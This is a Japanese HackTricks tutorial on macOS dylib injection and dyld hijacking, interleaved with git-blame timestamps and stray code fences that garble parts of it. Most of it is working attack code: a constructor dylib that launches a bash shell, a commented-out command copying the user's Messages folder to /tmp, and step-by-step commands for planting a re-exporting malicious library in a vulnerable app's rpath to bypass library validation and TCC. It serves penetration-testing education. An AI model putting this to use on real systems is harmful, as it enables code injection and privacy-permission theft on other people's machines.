2024-01-04 14:22:53 +00:00
# macOS Dyld ハイジャック & DYLD\_INSERT\_LIBRARIES
2023-05-15 08:11:15 +00:00
< details >
2024-01-04 14:22:53 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェック!< / strong > < / summary >
2023-05-15 08:11:15 +00:00
2024-01-04 14:22:53 +00:00
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを**共有する**。
2023-05-15 08:11:15 +00:00
< / details >
2024-01-04 14:22:53 +00:00
## DYLD\_INSERT\_LIBRARIES 基本例
2023-05-15 08:11:15 +00:00
2024-01-04 14:22:53 +00:00
シェルを実行するために**インジェクトするライブラリ**:
2023-05-15 08:11:15 +00:00
```c
2023-05-15 10:48:42 +00:00
// gcc -dynamiclib -o inject.dylib inject.c
2023-05-15 08:11:15 +00:00
#include <syslog.h>
2023-05-15 10:48:42 +00:00
#include <stdio.h>
2023-05-15 08:11:15 +00:00
#include <unistd.h>
2023-09-19 23:09:04 +00:00
#include <stdlib.h>
2023-05-15 08:11:15 +00:00
__attribute__((constructor))
2023-05-18 12:13:32 +00:00
void myconstructor(int argc, const char **argv)
2023-05-15 08:11:15 +00:00
{
2023-07-07 23:42:27 +00:00
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
2023-09-19 23:09:04 +00:00
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
2023-05-15 08:11:15 +00:00
}
```
2023-07-07 23:42:27 +00:00
攻撃対象のバイナリ:
2023-05-15 08:11:15 +00:00
```c
// gcc hello.c -o hello
#include <stdio.h>
int main()
{
2023-07-07 23:42:27 +00:00
printf("Hello, World!\n");
return 0;
2023-05-15 08:11:15 +00:00
}
```
2024-01-04 14:22:53 +00:00
インジェクション:
2023-05-15 08:11:15 +00:00
```bash
2023-05-15 10:48:42 +00:00
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
2023-05-15 08:11:15 +00:00
```
2024-01-04 14:22:53 +00:00
## Dyld ハイジャックの例
2023-05-15 08:11:15 +00:00
2023-09-19 23:09:04 +00:00
対象の脆弱なバイナリは `/Applications/VulnDyld.app/Contents/Resources/lib/binary` です。
2023-05-15 14:07:02 +00:00
{% tabs %}
2023-09-19 23:09:04 +00:00
{% tab title="entitlements" %}
< pre class = "language-bash" data-overflow = "wrap" > < code class = "lang-bash" > codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
< strong > [...]com.apple.security.cs.disable-library-validation[...]
< / strong > < / code > < / pre >
{% endtab %}
2023-05-15 14:07:02 +00:00
{% tab title="LC_RPATH" %}
{% code overflow="wrap" %}
```bash
# Check where are the @rpath locations
2023-09-19 23:09:04 +00:00
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2
2023-07-07 23:42:27 +00:00
cmd LC_RPATH
cmdsize 32
path @loader_path/ . (offset 12)
2023-05-15 14:07:02 +00:00
--
2023-07-07 23:42:27 +00:00
cmd LC_RPATH
cmdsize 32
2023-09-19 23:09:04 +00:00
path @loader_path/ ../lib2 (offset 12)
2023-05-15 14:07:02 +00:00
```
{% endcode %}
{% endtab %}
{% tab title="@rpath" %}
{% code overflow="wrap" %}
```bash
# Check librareis loaded using @rapth and the used versions
2023-09-19 23:09:04 +00:00
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3
name @rpath/lib .dylib (offset 24)
2023-07-07 23:42:27 +00:00
time stamp 2 Thu Jan 1 01:00:02 1970
current version 1.0.0
2023-05-15 14:07:02 +00:00
compatibility version 1.0.0
2023-09-19 23:09:04 +00:00
# Check the versions
2023-05-15 14:07:02 +00:00
```
2024-01-04 14:22:53 +00:00
前述の情報から、**ロードされたライブラリの署名をチェックしていない**こと、そして以下からライブラリをロードしようとしていることがわかります:
2023-05-15 14:07:02 +00:00
2023-09-19 23:09:04 +00:00
* `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
* `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`
2023-05-15 14:07:02 +00:00
2024-01-04 14:22:53 +00:00
しかし、最初のものは存在しません:
2023-05-15 14:07:02 +00:00
```bash
pwd
2023-09-19 23:09:04 +00:00
/Applications/VulnDyld.app
2023-05-15 14:07:02 +00:00
2023-09-19 23:09:04 +00:00
find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib
2023-05-15 14:07:02 +00:00
```
2024-01-04 14:22:53 +00:00
```markdown
だから、ハイジャックが可能です!**任意のコードを実行し、正規のライブラリと同じ機能をエクスポートする**ライブラリを作成し、それを再エクスポートします。予想されるバージョンでコンパイルすることを忘れないでください:
2023-05-15 14:07:02 +00:00
2023-09-19 23:09:04 +00:00
{% code title="lib.m" %}
2024-01-04 14:22:53 +00:00
```
2023-05-15 14:07:02 +00:00
```objectivec
#import <Foundation/Foundation.h>
__attribute__((constructor))
void custom(int argc, const char **argv) {
2023-09-19 23:09:04 +00:00
NSLog(@"[+] dylib hijacked in %s", argv[0]);
2023-05-15 14:07:02 +00:00
}
```
2024-01-04 14:22:53 +00:00
```
コンパイルする:
```
2023-05-15 14:07:02 +00:00
```bash
2023-09-19 23:09:04 +00:00
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
2023-05-15 14:07:02 +00:00
# Note the versions and the reexport
```
{% endcode %}
2024-01-04 14:22:53 +00:00
ライブラリ内に作成された再エクスポートパスはローダーに対して相対的です。エクスポートするライブラリへの絶対パスに変更しましょう:
2023-05-15 14:07:02 +00:00
{% code overflow="wrap" %}
```bash
#Check relative
2023-09-19 23:09:04 +00:00
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
2023-07-07 23:42:27 +00:00
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli .dylib (offset 24)
2023-05-15 14:07:02 +00:00
2023-09-19 23:09:04 +00:00
#Change the location of the library absolute to absolute path
install_name_tool -change @rpath/lib .dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib
2023-05-15 14:07:02 +00:00
# Check again
2023-09-19 23:09:04 +00:00
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
2023-07-07 23:42:27 +00:00
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
2023-05-15 14:07:02 +00:00
```
2024-01-04 14:22:53 +00:00
```
最終的には、**ハイジャックされた場所**にコピーします:
```
2023-05-15 14:07:02 +00:00
```bash
2023-09-19 23:09:04 +00:00
cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"
2023-05-15 14:07:02 +00:00
```
{% endcode %}
2024-01-04 14:22:53 +00:00
そして、バイナリを**実行**し、**ライブラリがロードされた**ことを確認します:
2023-05-15 14:07:02 +00:00
2023-09-19 23:09:04 +00:00
< pre class = "language-context" > < code class = "lang-context" > "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2024-01-04 14:22:53 +00:00
< strong > 2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
2023-09-19 23:09:04 +00:00
< / strong > 使用法: [...]
2023-05-15 14:07:02 +00:00
< / code > < / pre >
2023-05-16 16:54:39 +00:00
{% hint style="info" %}
2024-01-04 14:22:53 +00:00
Telegramのカメラ権限を悪用するこの脆弱性を悪用する方法についての素晴らしい記事はこちらで見つけることができます [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/ ](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/ )
2023-05-16 16:54:39 +00:00
{% endhint %}
2023-09-19 23:09:04 +00:00
## より大規模なスケール
2023-05-15 08:11:15 +00:00
2024-01-04 14:22:53 +00:00
予期しないバイナリにライブラリを注入しようと計画している場合、プロセス内でライブラリがロードされた時のイベントメッセージをチェックすることができます( この場合、printfと`/bin/bash`の実行を削除します)。
2023-05-15 08:11:15 +00:00
```bash
2023-05-15 14:07:02 +00:00
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
2023-05-15 08:11:15 +00:00
```
< details >
2024-01-04 14:22:53 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェック!< / strong > < / summary >
HackTricksをサポートする他の方法:
2023-05-15 08:11:15 +00:00
2024-01-04 14:22:53 +00:00
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks ) および [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) githubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
2023-05-15 08:11:15 +00:00
< / details >